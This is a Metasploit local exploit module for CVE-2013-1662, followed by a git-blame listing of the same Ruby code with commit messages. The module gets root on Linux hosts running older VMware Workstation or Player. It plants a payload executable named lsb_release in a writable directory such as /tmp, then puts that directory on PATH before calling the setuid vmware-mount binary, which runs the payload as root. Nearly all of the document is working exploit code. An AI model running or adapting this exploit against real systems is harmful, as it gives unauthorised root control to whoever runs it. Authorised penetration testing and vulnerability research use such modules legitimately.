modules/exploits/linux/local/vmware_mount.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::File

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',
          'Description' => %q{
            VMWare Workstation (up to and including 9.0.2 build-1031769)
            and Player have a setuid executable called vmware-mount that
            invokes lsb_release in the PATH with popen(3). Since PATH is
            user-controlled, and the default system shell on
            Debian-derived distributions does not drop privs, we can put
            an arbitrary payload in an executable called lsb_release and
            have vmware-mount happily execute it as root for us.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Tavis Ormandy', # Vulnerability discovery and PoC
            'egypt' # Metasploit module
          ],
          'Platform' => [ 'linux' ],
          'Arch' => ARCH_X86,
          'Targets' => [
            [ 'Automatic', {} ],
          ],
          'DefaultOptions' => {
            'PrependSetresuid' => true,
            'PrependSetresgid' => true,
            'PrependFork' => true
          },
          'Privileged' => true,
          'DefaultTarget' => 0,
          'References' => [
            [ 'CVE', '2013-1662' ],
            [ 'OSVDB', '96588' ],
            [ 'BID', '61966'],
            [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
            [ 'URL', 'https://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ],
            [ 'URL', 'https://www.rapid7.com/blog/post/2013/09/05/cve-2013-1662-vmware-mount-exploit' ]
          ],
          'DisclosureDate' => '2013-08-22',
          'Notes' => {
            'Stability' => [CRASH_SAFE],
            'Reliability' => [REPEATABLE_SESSION],
            'SideEffects' => [ARTIFACTS_ON_DISK]
          }
        }
      )
    )
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
    ]
  end

  def vmware_mount
    '/usr/bin/vmware-mount'
  end

  def check
    return CheckCode::Safe("#{vmware_mount} file not found") unless file? vmware_mount
    return CheckCode::Safe("#{vmware_mount} is not setuid") unless setuid? vmware_mount

    CheckCode::Appears
  end

  def exploit
    unless check == CheckCode::Appears
      fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
    end

    lsb_path = File.join(datastore['WritableDir'], 'lsb_release')
    write_file(lsb_path, generate_payload_exe)
    cmd_exec("chmod +x #{lsb_path}")
    cmd_exec("PATH=#{datastore['WritableDir']}:$PATH #{vmware_mount}")
    # Delete it here instead of using FileDropper because the original
    # session can clean it up
    cmd_exec("rm -f #{lsb_path}")
  end
end
Add local exploit for taviso's vmware privesc 2013-08-26 21:06:40 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add local exploit for taviso's vmware privesc 2013-08-26 21:06:40 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Local`
Add more ranks, remove module warnings 2017-05-03 11:12:55 -04:00			`Rank = ExcellentRanking`
Add local exploit for taviso's vmware privesc 2013-08-26 21:06:40 -05:00
Retab changes for PR #2304 2013-09-05 13:41:25 -05:00			`include Msf::Exploit::EXE`
			`include Msf::Post::File`
Add local exploit for taviso's vmware privesc 2013-08-26 21:06:40 -05:00
check files exist before suid checking them 2022-10-05 19:43:07 -04:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`{`
			`'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',`
			`'Description' => %q{`
			`VMWare Workstation (up to and including 9.0.2 build-1031769)`
			`and Player have a setuid executable called vmware-mount that`
			`invokes lsb_release in the PATH with popen(3). Since PATH is`
			`user-controlled, and the default system shell on`
			`Debian-derived distributions does not drop privs, we can put`
			`an arbitrary payload in an executable called lsb_release and`
			`have vmware-mount happily execute it as root for us.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
Complete the Author metadata 2013-08-26 23:29:16 -05:00			`'Tavis Ormandy', # Vulnerability discovery and PoC`
			`'egypt' # Metasploit module`
			`],`
check files exist before suid checking them 2022-10-05 19:43:07 -04:00			`'Platform' => [ 'linux' ],`
			`'Arch' => ARCH_X86,`
			`'Targets' => [`
			`[ 'Automatic', {} ],`
Add local exploit for taviso's vmware privesc 2013-08-26 21:06:40 -05:00			`],`
check files exist before suid checking them 2022-10-05 19:43:07 -04:00			`'DefaultOptions' => {`
			`'PrependSetresuid' => true,`
			`'PrependSetresgid' => true,`
			`'PrependFork' => true`
			`},`
			`'Privileged' => true,`
			`'DefaultTarget' => 0,`
			`'References' => [`
			`[ 'CVE', '2013-1662' ],`
			`[ 'OSVDB', '96588' ],`
			`[ 'BID', '61966'],`
			`[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],`
			`[ 'URL', 'https://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ],`
			`[ 'URL', 'https://www.rapid7.com/blog/post/2013/09/05/cve-2013-1662-vmware-mount-exploit' ]`
			`],`
			`'DisclosureDate' => '2013-08-22',`
			`'Notes' => {`
			`'Stability' => [CRASH_SAFE],`
			`'Reliability' => [REPEATABLE_SESSION],`
			`'SideEffects' => [ARTIFACTS_ON_DISK]`
			`}`
			`}`
			`)`
			`)`
Make WritableDir an advanced option 2018-10-10 14:12:29 +00:00			`register_advanced_options [`
check files exist before suid checking them 2022-10-05 19:43:07 -04:00			`OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])`
Make WritableDir an advanced option 2018-10-10 14:12:29 +00:00			`]`
Add local exploit for taviso's vmware privesc 2013-08-26 21:06:40 -05:00			`end`

review comments 2022-10-08 09:16:57 -04:00			`def vmware_mount`
			`'/usr/bin/vmware-mount'`
			`end`

Add local exploit for taviso's vmware privesc 2013-08-26 21:06:40 -05:00			`def check`
check files exist before suid checking them 2022-10-05 19:43:07 -04:00			`return CheckCode::Safe("#{vmware_mount} file not found") unless file? vmware_mount`
			`return CheckCode::Safe("#{vmware_mount} is not setuid") unless setuid? vmware_mount`

			`CheckCode::Appears`
Add local exploit for taviso's vmware privesc 2013-08-26 21:06:40 -05:00			`end`

			`def exploit`
Change to in exploit 2014-11-26 16:53:30 +10:00			`unless check == CheckCode::Appears`
Add local exploit for taviso's vmware privesc 2013-08-26 21:06:40 -05:00			`fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")`
			`end`

CamelCase 2018-10-10 14:35:34 +00:00			`lsb_path = File.join(datastore['WritableDir'], 'lsb_release')`
Suggestions from OJ 2014-11-27 21:38:50 +00:00			`write_file(lsb_path, generate_payload_exe)`
			`cmd_exec("chmod +x #{lsb_path}")`
review comments 2022-10-08 09:16:57 -04:00			`cmd_exec("PATH=#{datastore['WritableDir']}:$PATH #{vmware_mount}")`
I don't like end-of-line comments 2013-08-28 12:42:26 -05:00			`# Delete it here instead of using FileDropper because the original`
			`# session can clean it up`
Suggestions from OJ 2014-11-27 21:38:50 +00:00			`cmd_exec("rm -f #{lsb_path}")`
Add local exploit for taviso's vmware privesc 2013-08-26 21:06:40 -05:00			`end`
			`end`